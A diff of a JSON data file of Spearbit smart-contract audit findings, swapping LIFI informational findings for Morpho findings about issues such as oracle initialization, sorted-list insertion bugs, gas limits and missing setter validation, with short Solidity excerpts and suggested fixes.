contract in a wrong/inconsistent state.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Hardcode source Nomad domain ID via immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "AmarokFacet takes source domain ID as a user parameter and passes it to the bridge: originDomain: _bridgeData.srcChainDomain User provided can be incorrect, and Connext will later revert the transaction. See BridgeFacet.sol#L319-L321: if (_args.params.originDomain != s.domain) { revert BridgeFacet__xcall_wrongDomain(); }", + "title": "Setting a new rewards manager breaks claiming old rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Setting a new rewards manager will break any old unclaimed rewards as users can only claim through the PositionManager.claimRewards function which then uses the new reward manager.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Amount swapped not emitted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The emits LiFiTransferStarted() and LiFiTransferCompleted() dont emit the amount after the swap (e.g. the real amount that is being bridged / transferred to the receiver). 
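For the initialize/constructor validation finding above, a short sketch of the kind of checks meant; the parameter names and types are illustrative, not Morpho's actual signature:

// Sketch: validate critical addresses and bounds at initialization time.
function initialize(
    ILendingPoolAddressesProvider _addressesProvider,
    IMarketsManagerForAave _marketsManager,
    uint8 _NDS
) external initializer {
    require(address(_addressesProvider) != address(0), "zero addresses provider");
    require(address(_marketsManager) != address(0), "zero markets manager");
    require(_NDS > 0, "NDS must be > 0");
    // ... existing initialization ...
}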
This might be useful to add. 59 event LiFiTransferStarted( bytes32 indexed transactionId, string bridge, string bridgeData, string integrator, address referrer, address sendingAssetId, address receivingAssetId, address receiver, uint256 amount, uint256 destinationChainId, bool hasSourceSwap, bool hasDestinationCall ); event LiFiTransferCompleted( bytes32 indexed transactionId, address receivingAssetId, address receiver, uint256 amount, uint256 timestamp );", + "title": "Low/high MaxGas values could make match/unmatch supplier/borrower functions always fail or revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The maxGas variable is used to determine how much gas the matchSuppliers, unmatchSuppliers, matchBorrowers and unmatchBorrowers functions can consume while trying to match/unmatch a supplier/borrower and also updating their position if matched. maxGas = 0 will make the loop be skipped entirely. A low maxGas would make the loop run at least one time, but the smaller maxGas is, the higher the possibility that not all the available suppliers/borrowers are matched/unmatched. A very high maxGas could make the loop consume all the block gas, making the tx revert. Note that maxGas can be overridden by the user when calling supply, borrow", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Comment is not compatible with code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "On the HyphenFacet, Comment is mentioned that approval is given to Anyswap. But, approval is given to Hyphen router. function _startBridge(HyphenData memory _hyphenData) private { // Check chain id if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork(); if (_hyphenData.token != address(0)) { // Give Anyswap approval to bridge tokens LibAsset.maxApproveERC20(IERC20(_hyphenData.token), _hyphenData.router, _hyphenData.amount); }", + "title": "NDS min/max value should be properly validated to avoid tx to always fail/skip loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "PositionsManagerForAaveLogic is currently initialized with a default value of NDS = 20. The NDS value is used by MatchingEngineForAave when it needs to call DoubleLinkedList.insertSorted in both updateBorrowers and updateSuppliers. updateBorrowers and updateSuppliers are called by MatchingEngineForAave.matchBorrowers, MatchingEngineForAave.unmatchBorrowers, MatchingEngineForAave.matchSuppliers and MatchingEngineForAave.unmatchSuppliers. Those functions, and also directly updateBorrowers and updateSuppliers, are also called by PositionsManagerForAaveLogic. Problems: A low NDS value would make the loop inside insertSorted exit early, increasing the probability of a supplier/borrower being added to the tail of the list. This is something that Morpho would like to avoid because it would decrease protocol performance when it needs to match/unmatch suppliers/borrowers. In the case where a list is long enough, a very high value would make the transaction revert each time one of those functions directly or indirectly calls insertSorted. 
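For the maxGas finding above, a sketch of the gas-bounded matching loop pattern being discussed; the names are assumptions:

// Sketch: bound the matching work by a caller-supplied gas budget. With
// _maxGasForMatching == 0 the gas condition is false on the first check and
// the loop is skipped; a huge budget lets the loop run until the list is
// empty or the block gas limit is hit.
function _matchSuppliers(uint256 _amountToMatch, uint256 _maxGasForMatching) internal returns (uint256 matched) {
    uint256 gasAtStart = gasleft();
    address firstPoolSupplier = suppliersOnPool.getHead();
    while (
        matched < _amountToMatch &&
        firstPoolSupplier != address(0) &&
        gasAtStart - gasleft() < _maxGasForMatching
    ) {
        // ... move (part of) this supplier's liquidity from the pool to P2P,
        // increase `matched`, update the data structure ...
        firstPoolSupplier = suppliersOnPool.getHead();
    }
}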
The gas rail guard present in the match/unmatch supplier/borrower functions is useless because the loop would run at least one time.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Move whitelist to LibSwap.swap()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function LibSwap.swap() is dangerous because it can call any function of any contract. If this is exposed to the outside (like in GenericBridgeFacet), is might enable access to transferFrom() and thus stealing tokens. Also see issue \"Too generic calls in GenericBridgeFacet allow stealing of tokens\" Luckily most of the time LibSwap.swap() is called via _executeSwaps(), which has a whitelist and reduces the risk. To improve security it would be better to integrate the whitelists in LibSwap.swap(). Note: also see issue \"_executeSwaps of Executor.sol doesnt have a whitelist\" library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { if (!LibAsset.isContract(_swapData.callTo)) revert InvalidContract(); ... (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); ... } } contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } }", + "title": "Initial SwapManager cumulative prices values are wrong", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The initial cumulative price values are integer divisions of unscaled reserves and not UQ112x112 fixed-point values. (reserve0, reserve1, blockTimestampLast) = pair.getReserves(); price0CumulativeLast = reserve1 / reserve0; price1CumulativeLast = reserve0 / reserve1; One of these values will (almost) always be zero due to integer division. Then, when the difference from the real currentCumulativePrices is taken in update, the TWAP will be a large, wrong value. The slippage checks will not work correctly.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Redundant check on the HyphenFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the HyphenFacet, there is a condition which checks source chain is different than destination chain id. However, the conditional check is already placed on the Hyphen contracts. _depositErc20, _depositNative) function _startBridge(HyphenData memory _hyphenData) private { // Check chain id if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork(); }", + "title": "User withdrawals can fail if Morpho position is close to liquidation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "When trying to withdraw funds from Morpho as a P2P supplier, the last step of the withdrawal algorithm borrows an amount from the pool (\"hard withdraw\"). If the debt / collateral value of Morpho's position on Aave is higher than the market's maximum LTV ratio but lower than the market's liquidation threshold, the borrow will fail and the position cannot be liquidated. 
Therefore withdrawals could fail.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Check input amount equals swapped amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The bridge functions dont check that input amount ( _bridgeData.amount or msg.value) is equal to the swapped amount (_swapData[0].fromAmount). This could lead to funds remaining in the LiFi Diamond or Executor. Luckily noLeftovers() or checks on startingBalance solve this by sending the remaining balance to the origina- tor or receiver. However this is fixing symptoms instead of preventing the issue. function swapAndStartBridgeTokensViaOmniBridge( ... LibSwap.SwapData[] calldata _swapData, BridgeData calldata _bridgeData ) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ... }", + "title": "Event Withdrawn is emitted using the wrong amounts of supplyBalanceInOf", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Inside the _withdraw function, all changes performed to supplyBalanceInOf are done using the _supplier address. The _receiver is correctly used only to transfer the underlying token via underlyingToken.safeTransfer(_receiver, _amount); The Withdrawn event should be emitted passing the supplyBalanceInOf[_poolTokenAddress] of the supplier and not the receiver. This problem will arise when this internal function is called by PositionsManagerForAave.liquidate where supplier (borrower in this case) and receiver (liquidator) would not be the same address.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Use same layout for facets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The different bridge facets use different layouts for the source code. This can be seen at the call to _startBridge(). The code is easier to maintain If it is the same everywhere. 
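For the "Initial SwapManager cumulative prices values are wrong" finding above, a sketch of seeding the oracle from the pair's own cumulative counters, in the shape of the TwapSketch constructor shown earlier (with price1 handled the same way; the assumed IUniswapV2PairLike interface would gain price1CumulativeLast()):

constructor(IUniswapV2PairLike _pair) {
    pair = _pair;
    // The pair's counters are already UQ112x112 fixed-point price * seconds;
    // dividing raw reserves instead truncates one side to 0 and breaks the TWAP.
    price0CumulativeLast = _pair.price0CumulativeLast();
    price1CumulativeLast = _pair.price1CumulativeLast();
    (, , blockTimestampLast) = _pair.getReserves();
}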
62 AmarokFacet.sol: ArbitrumBridgeFacet.sol: OmniBridgeFacet.sol: OptimismBridgeFacet.sol: PolygonBridgeFacet.sol: StargateFacet.sol: AcrossFacet.sol: CBridgeFacet.sol: GenericBridgeFacet.sol: GnosisBridgeFacet.sol: HopFacet.sol: HyphenFacet.sol: NXTPFacet.sol: AnyswapFacet.sol: WormholeFacet.sol: AxelarFacet.sol: _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, true); _startBridge(_stargateData, _lifiData, nativeFee, true); _startBridge(_acrossData); _startBridge(_cBridgeData); _startBridge(_bridgeData); _startBridge(gnosisBridgeData); _startBridge(_hopData); _startBridge(_hyphenData); _startBridge(_nxtpData); _startBridge(_anyswapData, underlyingToken, isNative); _startBridge(_wormholeData); // no _startBridge", + "title": "_repayERC20ToPool is approving the wrong amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "_repayERC20ToPool is approving the amount of underlying token specified via the input parameter _amount when the correct amount that should be approved is the one calculated via: _amount = Math.min( _amount, variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) );", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Safety check is missing on the remaining amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "On the FeeCollector contract, There is no safety check to ensure remaining amount doesnt under- flow and revert. function collectNativeFees( uint256 integratorFee, uint256 lifiFee, address integratorAddress ) external payable { ... ... } uint256 remaining = msg.value - (integratorFee + lifiFee);", + "title": "Possible unbounded loop over enteredMarkets array in _getUserHypotheticalBalanceStates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "PositionsManagerForAaveLogic._getUserHypotheticalBalanceStates is looping over enteredMarkets, which could be an unbounded array, leading to a reverted transaction caused by the block gas limit. While it is true that Morpho will probably handle a subset of assets controlled by Aave, this loop could still revert because of gas limits for a variety of reasons: In the future Aave could have more assets and Morpho could match 1:1 those assets. Block gas size could decrease. Opcodes could cost more gas.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Entire struct can be emitted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The emit LiFiTransferStarted() generally outputs the entire struct _lifiData by specifying all Its also possible to emit the entire struct in one go. This would make the code smaller and fields of the struct. easier to maintain. 
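For the unbounded enteredMarkets loop above, one mitigation sketch is to cap the per-user array at market-entry time; MAX_ENTERED_MARKETS and _addToMarket are assumed names, not Morpho's code:

// Sketch: bound the per-user markets array so that later loops over it have
// a known worst-case gas cost.
uint256 public constant MAX_ENTERED_MARKETS = 32; // assumed bound

function _addToMarket(address _user, address _poolTokenAddress) internal {
    require(enteredMarkets[_user].length < MAX_ENTERED_MARKETS, "too many entered markets");
    enteredMarkets[_user].push(_poolTokenAddress);
}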
// do actions emit LiFiTransferStarted( _lifiData.transactionId, \"omni\", \"\", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); }", + "title": "Missing parameter validation on setters and event spamming prevention", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "User parameter validity should always be verified to prevent contract updates in an inconsistent state. The parameter's value should also be different from the old one in order to prevent event spamming (emitting an event when not needed) and improve contract monitoring. contracts/aave/RewardsManagerForAave.sol function setAaveIncentivesController(address _aaveIncentivesController) external override onlyOwner { + require(_aaveIncentivesController != address(0), \"param != address(0)\"); + require(_aaveIncentivesController != aaveIncentivesController, \"param != prevValue\"); aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController); emit AaveIncentivesControllerSet(_aaveIncentivesController); } contracts/aave/MarketsManagerForAave.sol function setReserveFactor(address _marketAddress, uint16 _newReserveFactor) external onlyOwner { - reserveFactor[_marketAddress] = HALF_MAX_BASIS_POINTS <= _newReserveFactor ? HALF_MAX_BASIS_POINTS : _newReserveFactor; - updateRates(_marketAddress); - emit ReserveFactorSet(_marketAddress, reserveFactor[_marketAddress]); + require(_marketAddress != address(0), \"param != address(0)\"); + uint16 finalReserveFactor = HALF_MAX_BASIS_POINTS <= _newReserveFactor ? HALF_MAX_BASIS_POINTS : _newReserveFactor; + if (finalReserveFactor != reserveFactor[_marketAddress]) { + reserveFactor[_marketAddress] = finalReserveFactor; + emit ReserveFactorSet(_marketAddress, finalReserveFactor); + } + updateRates(_marketAddress); } function setNoP2P(address _marketAddress, bool _noP2P) external onlyOwner isMarketCreated(_marketAddress) { + require(_noP2P != noP2P[_marketAddress], \"param != prevValue\"); noP2P[_marketAddress] = _noP2P; emit NoP2PSet(_marketAddress, _noP2P); } function updateP2PExchangeRates(address _marketAddress) external override onlyPositionsManager + isMarketCreated(_marketAddress) { _updateP2PExchangeRates(_marketAddress); } function updateSPYs(address _marketAddress) external override onlyPositionsManager + isMarketCreated(_marketAddress) { _updateSPYs(_marketAddress); } contracts/aave/positions-manager-parts/PositionsManagerForAaveGettersSetters.sol function setAaveIncentivesController(address _aaveIncentivesController) external onlyOwner { + require(_aaveIncentivesController != address(0), \"param != address(0)\"); + require(_aaveIncentivesController != aaveIncentivesController, \"param != prevValue\"); aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController); emit AaveIncentivesControllerSet(_aaveIncentivesController); } Important note: the _newNDS min/max value should be accurately validated by the team because this will influence the maximum number of cycles that DDL.insertSorted can do. Setting a value too high would make the transaction fail while setting it too low would make the insertSorted loop exit earlier, resulting in the user being added to the tail of the list. 
A more detailed issue about the NDS value can be found here: #33 function setNDS(uint8 _newNDS) external onlyOwner { + // add a check on `_newNDS` validating correctly the max/min value of `_newNDS` + require(NDS != _newNDS, \"param != prevValue\"); NDS = _newNDS; emit NDSSet(_newNDS); } Important note: _maxGas set to 0 would skip all the MatchingEngineForAave match/unmatch supplier/borrower functions if the user does not specify a custom maxGas. A more detailed issue about this value can be found here: #34 function setMaxGas(MaxGas memory _maxGas) external onlyOwner { + // add a check on `_maxGas` validating correctly the max/min value of `_maxGas` + // add a check on `_maxGas` internal values checking that at least one of them is different compared to the old version maxGas = _maxGas; emit MaxGasSet(_maxGas); } function setTreasuryVault(address _newTreasuryVaultAddress) external onlyOwner { + require(_newTreasuryVaultAddress != address(0), \"param != address(0)\"); + require(_newTreasuryVaultAddress != treasuryVault, \"param != prevValue\"); treasuryVault = _newTreasuryVaultAddress; emit TreasuryVaultSet(_newTreasuryVaultAddress); } function setRewardsManager(address _rewardsManagerAddress) external onlyOwner { + require(_rewardsManagerAddress != address(0), \"param != address(0)\"); + require(_rewardsManagerAddress != rewardsManager, \"param != prevValue\"); rewardsManager = IRewardsManagerForAave(_rewardsManagerAddress); emit RewardsManagerSet(_rewardsManagerAddress); } Important note: Should also check that _poolTokenAddress is currently handled by the PositionsManagerForAave and by the MarketsManagerForAave. Without this check a poolToken could start in a paused state. function setPauseStatus(address _poolTokenAddress) external onlyOwner { + require(_poolTokenAddress != address(0), \"param != address(0)\"); bool newPauseStatus = !paused[_poolTokenAddress]; paused[_poolTokenAddress] = newPauseStatus; emit PauseStatusSet(_poolTokenAddress, newPauseStatus); }", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Redundant return value from internal function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Callers of NXTPFacet._startBridge() function never use its return value.", + "title": "DDL should prevent inserting items with 0 value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Currently the DDL library is only checking that the actual value (_list.accounts[_id].value) in the list associated with the _id is 0 to prevent inserting duplicates. The DDL library should also verify that the inserted value is greater than 0. This check would prevent adding users with empty values, which may potentially cause the list, and as a result the overall protocol, to underperform.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Change comment on the LibAsset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The following comment is used in the LibAsset.sol contract. However, Connext doesnt have this file anymore and deleted with the following commit. 
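Filling in the placeholder comments above, a sketch of a bounded setNDS; MIN_NDS and MAX_NDS are assumed constants that the team would have to choose:

uint8 public constant MIN_NDS = 4;  // assumed lower bound
uint8 public constant MAX_NDS = 64; // assumed upper bound

function setNDS(uint8 _newNDS) external onlyOwner {
    require(_newNDS >= MIN_NDS && _newNDS <= MAX_NDS, "NDS out of range");
    require(NDS != _newNDS, "param != prevValue");
    NDS = _newNDS;
    emit NDSSet(_newNDS);
}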
/// @title LibAsset /// @author Connext /// @notice This library contains helpers for dealing with onchain transfers /// /// library LibAsset {} of assets, including accounting for the native asset `assetId` conventions and any noncompliant ERC20 transfers", + "title": "insertSorted iterates more than max iterations parameter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The insertSorted function iterates _maxIterations + 1 times instead of _maxIterations times.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Integrate all variants of _executeAndCheckSwaps()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There are multiple functions that are more or less the same: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol _executeAndCheckSwaps() of SwapperV2.sol _executeAndCheckSwaps() of Swapper.sol swapAndCompleteBridgeTokens() of XChainExecFacet As these are important functions it is worth the trouble to have one code base to maintain. For example swapAnd- CompleteBridgeTokens() doesnt check msg.value ==0 when ERC20 tokens are send. Note: swapAndCompleteBridgeTokensViaStargate() of StargateFacet.sol already uses SwapperV2.sol", + "title": "insertSorted does not behave like a FIFO for same values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Users that have the same value are inserted into the list before other users with the same value. It does not respect the \"seniority\" of the users' order and should behave more like a FIFO queue.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Utilize NATIVE_ASSETID constant from LibAsset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the codebase, LibAsset library contains the variable which defines zero address. However, on the facets the check is repeated. Code should not be repeated and its better to have one version used everywhere to reduce likelihood of bugs. contract AcrossFacet { address internal constant ZERO_ADDRESS = 0x0000000000000000000000000000000000000000; } contract DexManagerFacet { if (_dex == 0x0000000000000000000000000000000000000000) } contract WithdrawFacet { address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; ... } address sendTo = (_to == address(0)) ? msg.sender : _to;", + "title": "insertSorted inserts elements at wrong index", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The insertSorted function inserts elements after the last element when these should actually have been inserted before the last element. The sort order is therefore wrong, even if the maximum iterations count has not been reached. This is because of the check that the current element is not the tail. if ( ... && current != _list.tail) { insertBefore } else { insertAtEnd } Example: list = [20], insert(40): then current == list.tail, and the element is inserted at the back instead of the front. 
result = [20, 40] list = [30, 10], insert(20): the insertion point should be before current == 10, but also current == tail; therefore the current != _list.tail condition is false and the element is wrongly inserted at the end. result = [30, 10, 20]", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Low Risk" ] }, { - "title": "Native matic will be treated as ERC20 token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "LiFi supports Polygon on their implementation. However, Native MATIC on the Polygon has the contract 0x0000000000000000000000000000000000001010 address. Even if, It does not pose any risk, Native Matic will be treated as an ERC20 token. contract WithdrawFacet { address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; // address(0) ...", + "title": "PositionsManagerForAaveLogic gas optimization suggestions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Update the remainingTo variable only when needed. Inside each function, the remainingTo counter could be moved inside the if statement to avoid calculation when the amount that should be subtracted is 0.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Gas Optimization" ] }, { - "title": "Multiple versions of noLeftovers modifier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The modifier noLeftovers is defined in 3 different files: Swapper.sol, SwapperV2.sol and Ex- ecutor.sol. While the versions on Swapper.sol and Executor.sol are the same, they differ with the one in Executor.sol. Assuming the recommendation for \"Processing of end balances\" is followed, the only difference is that noLeftovers in SwapperV2.sol doesnt revert when new balance is less than initial balance. Code should not be repeated and its better to have one version used everywhere to reduce likelihood of bugs.", + "title": "MarketsManagerForAave._updateSPYs could store calculations in local variables to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The calculation in the actual code must be updated following this issue: #36. This current issue is an example of how to avoid an additional SLOAD. The function could store locally currentReserveFactor, newSupplyP2PSPY and newBorrowP2PSPY to avoid additional SLOADs", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Gas Optimization" ] }, { - "title": "Reduce unchecked scope", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Both zapIn() functions in FusePoolZap.sol operate in unchecked block which means any contained arithmetic can underflow or overflow. 
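Pulling the three insertSorted findings above together (one iteration too many, non-FIFO ordering for equal values, and the wrong index when current is the tail), here is a minimal corrected sketch; the struct layout mirrors a typical doubly-linked-list library and is an assumption, not Morpho's exact code:

pragma solidity ^0.8.0;

library SortedDoubleLinkedList {
    struct Account { address prev; address next; uint256 value; }
    struct List { mapping(address => Account) accounts; address head; address tail; }

    function insertSorted(List storage _list, address _id, uint256 _value, uint256 _maxIterations) internal {
        require(_value != 0, "value must be > 0"); // also covers the zero-value finding above
        require(_id != address(0) && _list.accounts[_id].value == 0, "account exists or id is zero");

        uint256 visited;
        address current = _list.head;
        // '>=' walks past equal values so earlier entries keep their place (FIFO).
        while (visited < _maxIterations && current != address(0) && _list.accounts[current].value >= _value) {
            current = _list.accounts[current].next;
            unchecked { ++visited; }
        }
        // Budget spent while still facing a larger-or-equal value: fall back to the tail.
        if (current != address(0) && _list.accounts[current].value >= _value && visited == _maxIterations) {
            current = address(0);
        }

        if (current == address(0)) {
            // Insert at the tail (list exhausted or iteration budget spent).
            address oldTail = _list.tail;
            _list.accounts[_id] = Account(oldTail, address(0), _value);
            if (oldTail == address(0)) _list.head = _id;
            else _list.accounts[oldTail].next = _id;
            _list.tail = _id;
        } else {
            // Insert before `current`, with no special-casing of the tail, so
            // list = [30, 10], insert(20) yields [30, 20, 10] as expected.
            address before = _list.accounts[current].prev;
            _list.accounts[_id] = Account(before, current, _value);
            _list.accounts[current].prev = _id;
            if (before == address(0)) _list.head = _id;
            else _list.accounts[before].next = _id;
        }
    }
}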
Currently, it effects only one line in both functions: FusePoolZap.sol#L67: uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)) - preMintBalance; FusePoolZap.sol#L104 mintAmount = mintAmount - preMintBalance; Having unchecked for such a large scope when it is applicable to only one line is dangerous.", + "title": "Declare variable as immutable/constant and remove unused variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Some state variables can be declared as immutable or constant to save gas. Constant variables should be named in uppercase + snake case following the official Solidity style guide. Additionally, variables which are never used across the protocol code can be removed to save gas during deployment and improve readability. RewardsManagerForAave.sol -ILendingPoolAddressesProvider public addressesProvider; -ILendingPool public lendingPool; +ILendingPool public immutable lendingPool; -IPositionsManagerForAave public positionsManager; +IPositionsManagerForAave public immutable positionsManager; SwapManagerUniV2.sol -IUniswapV2Router02 public swapRouter = IUniswapV2Router02(0x60aE616a2155Ee3d9A68541Ba4544862310933d4); // JoeRouter +IUniswapV2Router02 public constant SWAP_ROUTER = IUniswapV2Router02(0x60aE616a2155Ee3d9A68541Ba4544862310933d4); // JoeRouter -IUniswapV2Pair public pair; +IUniswapV2Pair public immutable pair; SwapManagerUniV3.sol -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. -address public WETH9; // Intermediate token address. +address public immutable WETH9; // Intermediate token address. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -bool public singlePath; +bool public immutable singlePath; SwapManagerUniV3OnEth.sol -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -IUniswapV3Pool public pool2; +IUniswapV3Pool public immutable pool2;", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Gas Optimization" ] }, { - "title": "No event exists for core paths/functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Several key actions are defined without event declarations. Owner only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces. There are 4 instances of this issue: 67 contract PeripheryRegistryFacet { function registerPeripheryContract(...) ... { } } contract LibAccess { function addAccess(...) ... { } function removeAccess(...) ... { } } contract AccessManagerFacet { function setCanExecute(...) ... 
{ } }", + "title": "Function does not revert if balance to transfer is zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Currently when the claimToTreasury() function is called it gets the amountToClaim by using un- derlyingToken.balanceOf(address(this). It then uses this amountToClaim in the safeTransfer() function and the ReserveFeeClaimed event is emitted. The problem is that the function does not take into account that it is possible for the amountToClaim to be 0. In this case the safeTransfer function would still be called and the ReserveFeeClaimed event would still be emitted unnecessarily.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Gas Optimization" ] }, { - "title": "Rename _receiver to _leftoverReceiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the contracts Swapper.sol, SwapperV2.sol and Executor.sol the parameter _receiver is used in various places. Its name seems to suggest that the result of the swapped tokens are send to the _receiver, however this is not the case. Instead the left over tokens are send to the _receiver. This makes the code more difficult to read and maintain. contract SwapperV2 is ILiFi { modifier noLeftovers(..., address payable _receiver) { ... } function _executeAndCheckSwaps(..., address payable _receiver) 